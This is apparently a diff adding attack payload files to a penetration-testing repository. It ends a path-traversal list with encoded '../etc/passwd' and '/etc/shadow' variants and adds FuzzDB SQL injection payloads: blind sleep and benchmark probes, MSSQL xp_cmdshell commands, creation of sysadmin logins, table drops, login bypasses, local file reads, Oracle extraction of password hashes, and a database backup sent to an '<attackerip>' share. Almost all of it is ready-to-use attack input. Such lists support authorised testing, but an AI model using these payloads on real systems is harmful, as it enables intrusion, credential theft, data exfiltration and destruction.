/var/log/dmesg
|
||||||
|
/var/log/error_log
|
||||||
|
/var/log/error.log
|
||||||
|
../../../../../../../var/log/error_log
|
||||||
|
../../../../../../../var/log/error.log
|
||||||
|
../../../../../var/log/error_log
|
||||||
|
/var/log/exim_mainlog
|
||||||
|
/var/log/exim/mainlog
|
||||||
|
/var/log/exim_paniclog
|
||||||
|
/var/log/exim/paniclog
|
||||||
|
/var/log/exim_rejectlog
|
||||||
|
/var/log/exim/rejectlog
|
||||||
|
/var/log/ftplog
|
||||||
|
/var/log/ftp-proxy
|
||||||
|
/var/log/ftp-proxy/ftp-proxy.log
|
||||||
|
/var/log/httpd/
|
||||||
|
/var/log/httpd/access_log
|
||||||
|
/var/log/httpd/access.log
|
||||||
|
../../../../../var/log/httpd/access_log
|
||||||
|
/var/log/httpd/error_log
|
||||||
|
/var/log/httpd/error.log
|
||||||
|
../../../../../var/log/httpd/error_log
|
||||||
|
/var/log/httpsd/ssl.access_log
|
||||||
|
/var/log/httpsd/ssl_log
|
||||||
|
/var/log/kern.log
|
||||||
|
/var/log/lastlog
|
||||||
|
/var/log/lighttpd
|
||||||
|
/var/log/maillog
|
||||||
|
/var/log/message
|
||||||
|
/var/log/messages
|
||||||
|
/var/log/mysqlderror.log
|
||||||
|
/var/log/mysqld.log
|
||||||
|
/var/log/mysql.log
|
||||||
|
/var/log/mysql/mysql-bin.log
|
||||||
|
/var/log/mysql/mysql.log
|
||||||
|
/var/log/mysql/mysql-slow.log
|
||||||
|
/var/log/ncftpd.errs
|
||||||
|
/var/log/ncftpd/misclog.txt
|
||||||
|
/var/log/news
|
||||||
|
/var/log/news.all
|
||||||
|
/var/log/news/news
|
||||||
|
/var/log/news/news.all
|
||||||
|
/var/log/news/news.crit
|
||||||
|
/var/log/news/news.err
|
||||||
|
/var/log/news/news.notice
|
||||||
|
/var/log/news/suck.err
|
||||||
|
/var/log/news/suck.notice
|
||||||
|
/var/log/poplog
|
||||||
|
/var/log/POPlog
|
||||||
|
/var/log/proftpd
|
||||||
|
/var/log/proftpd.access_log
|
||||||
|
/var/log/proftpd.xferlog
|
||||||
|
/var/log/proftpd/xferlog.legacy
|
||||||
|
/var/log/pureftpd.log
|
||||||
|
/var/log/pure-ftpd/pure-ftpd.log
|
||||||
|
/var/log/qmail
|
||||||
|
/var/log/qmail/
|
||||||
|
/var/log/samba
|
||||||
|
/var/log/samba-log.%m
|
||||||
|
/var/log/secure
|
||||||
|
/var/log/smtpd
|
||||||
|
/var/log/spooler
|
||||||
|
/var/log/syslog
|
||||||
|
/var/log/telnetd
|
||||||
|
/var/log/thttpd_log
|
||||||
|
/var/log/utmp
|
||||||
|
/var/log/vsftpd.log
|
||||||
|
/var/log/wtmp
|
||||||
|
/var/log/xferlog
|
||||||
|
/var/log/yum.log
|
||||||
|
/var/lp/logs/lpNet
|
||||||
|
/var/lp/logs/lpsched
|
||||||
|
/var/lp/logs/requests
|
||||||
|
/var/mysql.log
|
||||||
|
/var/run/httpd.pid
|
||||||
|
/var/run/mysqld/mysqld.pid
|
||||||
|
/var/run/utmp
|
||||||
|
/var/saf/_log
|
||||||
|
/var/saf/port/log
|
||||||
|
/var/spool/errors
|
||||||
|
/var/spool/locks
|
||||||
|
/var/spool/logs
|
||||||
|
/var/spool/tmp
|
||||||
|
/var/www/conf/httpd.conf
|
||||||
|
/var/www/html/.htaccess
|
||||||
|
/var/www/localhost/htdocs/.htaccess
|
||||||
|
/var/www/log/access_log
|
||||||
|
/var/www/log/error_log
|
||||||
|
/../../var/www/logs/access_log
|
||||||
|
/var/www/logs/access_log
|
||||||
|
/var/www/logs/access.log
|
||||||
|
../../../../../../../var/www/logs/access_log
|
||||||
|
../../../../../../../var/www/logs/access.log
|
||||||
|
../../../../../var/www/logs/access.log
|
||||||
|
/var/www/logs/error_log
|
||||||
|
/var/www/logs/error.log
|
||||||
|
../../../../../../../var/www/logs/error_log
|
||||||
|
../../../../../../../var/www/logs/error.log
|
||||||
|
../../../../../var/www/logs/error_log
|
||||||
|
../../../../../var/www/logs/error.log
|
||||||
|
/var/www/sitename/htdocs/
|
||||||
|
/var/www/vhosts/sitename/httpdocs/.htaccess
|
||||||
|
/var/www/web1/html/.htaccess
|
||||||
|
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
||||||
|
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
||||||
|
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
|
||||||
|
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
||||||
|
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
||||||
|
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
|
||||||
|
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
||||||
|
/Volumes/webBackup/opt/apache2/conf/httpd.conf
|
||||||
|
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
||||||
|
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
||||||
|
/web/conf/php.ini
|
||||||
|
/WINDOWS\php.ini
|
||||||
|
../../windows/win.ini
|
||||||
|
/WINNT\php.ini
|
||||||
|
/..\..\..\..\..\..\winnt\win.ini
|
||||||
|
/www/logs/proftpd.system.log
|
||||||
|
/xampp\apache\bin\php.ini
|
||||||
|
/.Xauthority
|
||||||
|
..2fapache2flogs2ferror.log
|
||||||
|
..2fapache2flogs2faccess.log
|
||||||
|
..2f..2fapache2flogs2ferror.log
|
||||||
|
..2f..2fapache2flogs2faccess.log
|
||||||
|
..2f..2f..2fapache2flogs2ferror.log
|
||||||
|
..2f..2f..2fapache2flogs2faccess.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
|
||||||
|
..2fetc2fpasswd
|
||||||
|
..2fetc2fpasswd%00
|
||||||
|
..2f..2fetc2fpasswd
|
||||||
|
..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||||
|
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
|
||||||
|
L2V0Yy9tYXN0ZXIucGFzc3dk
|
||||||
|
L21hc3Rlci5wYXNzd2Q=
|
||||||
|
ZXRjL3Bhc3N3ZA==
|
||||||
|
ZXRjL3NoYWRvdyUwMA==
|
||||||
|
L2V0Yy9wYXNzd2Q=
|
||||||
|
L2V0Yy9wYXNzd2QlMDA=
|
||||||
|
Li4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
|
||||||
|
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
|
42
SQL injection/Payloads/FUZZDB_GenericBlind.txt
Normal file
42
SQL injection/Payloads/FUZZDB_GenericBlind.txt
Normal file
@ -0,0 +1,42 @@
|
|||||||
|
# from wapiti
|
||||||
|
sleep(__TIME__)#
|
||||||
|
1 or sleep(__TIME__)#
|
||||||
|
" or sleep(__TIME__)#
|
||||||
|
' or sleep(__TIME__)#
|
||||||
|
" or sleep(__TIME__)="
|
||||||
|
' or sleep(__TIME__)='
|
||||||
|
1) or sleep(__TIME__)#
|
||||||
|
") or sleep(__TIME__)="
|
||||||
|
') or sleep(__TIME__)='
|
||||||
|
1)) or sleep(__TIME__)#
|
||||||
|
")) or sleep(__TIME__)="
|
||||||
|
')) or sleep(__TIME__)='
|
||||||
|
;waitfor delay '0:0:__TIME__'--
|
||||||
|
);waitfor delay '0:0:__TIME__'--
|
||||||
|
';waitfor delay '0:0:__TIME__'--
|
||||||
|
";waitfor delay '0:0:__TIME__'--
|
||||||
|
');waitfor delay '0:0:__TIME__'--
|
||||||
|
");waitfor delay '0:0:__TIME__'--
|
||||||
|
));waitfor delay '0:0:__TIME__'--
|
||||||
|
'));waitfor delay '0:0:__TIME__'--
|
||||||
|
"));waitfor delay '0:0:__TIME__'--
|
||||||
|
benchmark(10000000,MD5(1))#
|
||||||
|
1 or benchmark(10000000,MD5(1))#
|
||||||
|
" or benchmark(10000000,MD5(1))#
|
||||||
|
' or benchmark(10000000,MD5(1))#
|
||||||
|
1) or benchmark(10000000,MD5(1))#
|
||||||
|
") or benchmark(10000000,MD5(1))#
|
||||||
|
') or benchmark(10000000,MD5(1))#
|
||||||
|
1)) or benchmark(10000000,MD5(1))#
|
||||||
|
")) or benchmark(10000000,MD5(1))#
|
||||||
|
')) or benchmark(10000000,MD5(1))#
|
||||||
|
pg_sleep(__TIME__)--
|
||||||
|
1 or pg_sleep(__TIME__)--
|
||||||
|
" or pg_sleep(__TIME__)--
|
||||||
|
' or pg_sleep(__TIME__)--
|
||||||
|
1) or pg_sleep(__TIME__)--
|
||||||
|
") or pg_sleep(__TIME__)--
|
||||||
|
') or pg_sleep(__TIME__)--
|
||||||
|
1)) or pg_sleep(__TIME__)--
|
||||||
|
")) or pg_sleep(__TIME__)--
|
||||||
|
')) or pg_sleep(__TIME__)--
|
17
SQL injection/Payloads/FUZZDB_MSSQL.txt
Normal file
17
SQL injection/Payloads/FUZZDB_MSSQL.txt
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
# you will need to customize/modify some of the vaules in the queries for best effect
|
||||||
|
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||||
|
'create user name identified by 'pass123' --
|
||||||
|
'create user name identified by pass123 temporary tablespace temp default tablespace users;
|
||||||
|
' ; drop table temp --
|
||||||
|
'exec sp_addlogin 'name' , 'password' --
|
||||||
|
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
|
||||||
|
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
|
||||||
|
' grant connect to name; grant resource to name; --
|
||||||
|
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
||||||
|
' or 1=1 --
|
||||||
|
' union (select @@version) --
|
||||||
|
' union (select NULL, (select @@version)) --
|
||||||
|
' union (select NULL, NULL, (select @@version)) --
|
||||||
|
' union (select NULL, NULL, NULL, (select @@version)) --
|
||||||
|
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||||||
|
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
15
SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt
Normal file
15
SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
# ms-sqli info disclosure payload fuzzfile
|
||||||
|
# replace regex with your fuzzer for best results <attackerip> <sharename>
|
||||||
|
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
|
||||||
|
# might need to terminate payloads with ;--
|
||||||
|
select @@version
|
||||||
|
select @@servernamee
|
||||||
|
select @@microsoftversione
|
||||||
|
select * from master..sysserverse
|
||||||
|
select * from sysusers
|
||||||
|
exec master..xp_cmdshell 'ipconfig+/all'
|
||||||
|
exec master..xp_cmdshell 'net+view'
|
||||||
|
exec master..xp_cmdshell 'net+users'
|
||||||
|
exec master..xp_cmdshell 'ping+<attackerip>'
|
||||||
|
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
|
||||||
|
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
|
6
SQL injection/Payloads/FUZZDB_MYSQL.txt
Normal file
6
SQL injection/Payloads/FUZZDB_MYSQL.txt
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
1'1
|
||||||
|
1 exec sp_ (or exec xp_)
|
||||||
|
1 and 1=1
|
||||||
|
1' and 1=(select count(*) from tablenames); --
|
||||||
|
1 or 1=1
|
||||||
|
1' or '1'='1
|
3
SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt
Normal file
3
SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt
Normal file
@ -0,0 +1,3 @@
|
|||||||
|
# mysql local file disclosure through sqli
|
||||||
|
# fuzz interesting absolute filepath/filename into <filepath>
|
||||||
|
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
8
SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt
Normal file
8
SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt
Normal file
@ -0,0 +1,8 @@
|
|||||||
|
# regex replace as many as you can with your fuzzer for best results:
|
||||||
|
# <user-fieldname> <pass-fieldname> <username>
|
||||||
|
# also try to brute force a list of possible usernames, including possile admin acct names
|
||||||
|
<username>' OR 1=1--
|
||||||
|
'OR '' = ' Allows authentication without a valid username.
|
||||||
|
<username>'--
|
||||||
|
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
||||||
|
'OR 1=1--
|
56
SQL injection/Payloads/FUZZDB_Oracle.txt
Normal file
56
SQL injection/Payloads/FUZZDB_Oracle.txt
Normal file
@ -0,0 +1,56 @@
|
|||||||
|
# contains statements from jbrofuzz
|
||||||
|
’ or ‘1’=’1
|
||||||
|
' or '1'='1
|
||||||
|
'||utl_http.request('httP://192.168.1.1/')||'
|
||||||
|
' || myappadmin.adduser('admin', 'newpass') || '
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
|
||||||
|
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
|
||||||
|
